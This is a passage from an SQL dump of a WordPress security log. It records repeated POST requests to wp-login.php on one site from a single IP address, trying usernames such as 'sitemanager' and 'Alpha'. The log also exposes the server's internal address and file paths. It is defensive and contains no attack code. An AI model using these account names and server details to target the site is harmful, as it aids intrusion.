03:26:57','2025-05-14 05:44:25'),(95759,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55503\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087016.2685039;s:12:\"REQUEST_TIME\";i:1747087016;}}','43.205.255.0',1,'2025-05-13 03:26:57','2025-05-14 05:44:25'),(95760,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55505\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087017.3771169;s:12:\"REQUEST_TIME\";i:1747087017;}}','43.205.255.0',1,'2025-05-13 03:26:58','2025-05-14 05:44:25'),(95761,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51507\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087671.8915789;s:12:\"REQUEST_TIME\";i:1747087671;}}','43.205.255.0',1,'2025-05-13 03:37:53','2025-05-14 05:44:25'),(95762,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51499\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087671.8840179;s:12:\"REQUEST_TIME\";i:1747087671;}}','43.205.255.0',1,'2025-05-13 03:37:53','2025-05-14 05:44:25'),(95763,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51498\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087671.8720369;s:12:\"REQUEST_TIME\";i:1747087671;}}','43.205.255.0',1,'2025-05-13 03:37:53','2025-05-14 05:44:25'),(95764,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51500\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087671.871403;s:12:\"REQUEST_TIME\";i:1747087671;}}','43.205.255.0',1,'2025-05-13 03:37:53','2025-05-14 05:44:25'),(95765,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51508\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747087673.584902;s:12:\"REQUEST_TIME\";i:1747087673;}}','43.205.255.0',1,'2025-05-13 03:37:55','2025-05-14 05:44:25'),(95766,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63674\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747088335.26998;s:12:\"REQUEST_TIME\";i:1747088335;}}','43.205.255.0',1,'2025-05-13 03:48:57','2025-05-14 05:44:25'),(95767,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63670\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747088335.2693391;s:12:\"REQUEST_TIME\";i:1747088335;}}','43.205.255.0',1,'2025-05-13 03:48:57','2025-05-14 05:44:25'),(95768,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63668\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747088336.9656019;s:12:\"REQUEST_TIME\";i:1747088336;}}','43.205.255.0',1,'2025-05-13 03:48:58','2025-05-14 05:44:25'),(95769,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63681\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747088336.9662621;s:12:\"REQUEST_TIME\";i:1747088336;}}','43.205.255.0',1,'2025-05-13 03:48:58','2025-05-14 05:44:25'),(95770,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63678\";s:11:\"REMOTE_ADDR\";s:12:\"43.205.255.0\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747088337.9110789;s:12:\"REQUEST_TIME\";i:1747088337;}}','43.205.255.0',1,'2025-05-13 03:48:59','2025-05-14 